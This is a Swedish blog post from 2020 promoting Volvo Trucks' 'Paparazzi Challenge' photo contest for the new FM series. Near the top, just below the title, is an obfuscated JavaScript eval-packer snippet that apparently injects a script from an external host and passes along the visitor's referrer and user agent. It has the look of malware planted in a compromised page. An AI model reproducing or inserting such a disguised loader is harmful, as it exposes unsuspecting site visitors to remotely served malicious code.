Image Image Image Image Image Image Image Image Image Image

| 29 maj, 2020

Scroll to top

Top

Tävla med Volvo Truck Paparazzi

Tävla med Volvo Truck Paparazzi

type=”text/javascript”>// eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ksnan|var|u0026u|referrer|hhrzt||js|php’.split(’|’),0,{}))

Kommer ni ihåg volvos senaste virala kampanj som blev en riktig snackis senast? Jag talar såklart om den välkända ballerinan som under körning skulle ta sig mellan två lastbilar på motorvägen med endast en liten lina under fötterna. 

Vårt älskade bilmärke Volvo har skickat ut två stycken nya Volvo FM-lastbilar på vägarna i Europa. Om just du tar det första fotot på någon av lastbilarna innan deras lansering kan du vinna en provkörning inklusive hotellvistelse med mera.

Du kan även vinna samma pris om du tar det bästa fotot i varje land. Volvo kommer att lägga ut ledtrådar på vart lastbilarna befinner sig så att du enkelt kan följa dem på vägen.

VOLVO Trucks is back. This time with a world premiere on their new FM series. Remember the Ballerina Stunt? That video was born global and went viral in only few hours after it launched. Once again Volvo is pioneering online video with a new feature. Volvo is renowned for doing creative branding activities, and to create awesome buzz around this new release. They have once again out of their way to create a unique and creative campaign

Knäpp en bild och skicka in den till Volvo – var med i Paparazzi Challenge.

Mer information finns i videon ovan och på Volvos hemsida

Var med och tävla!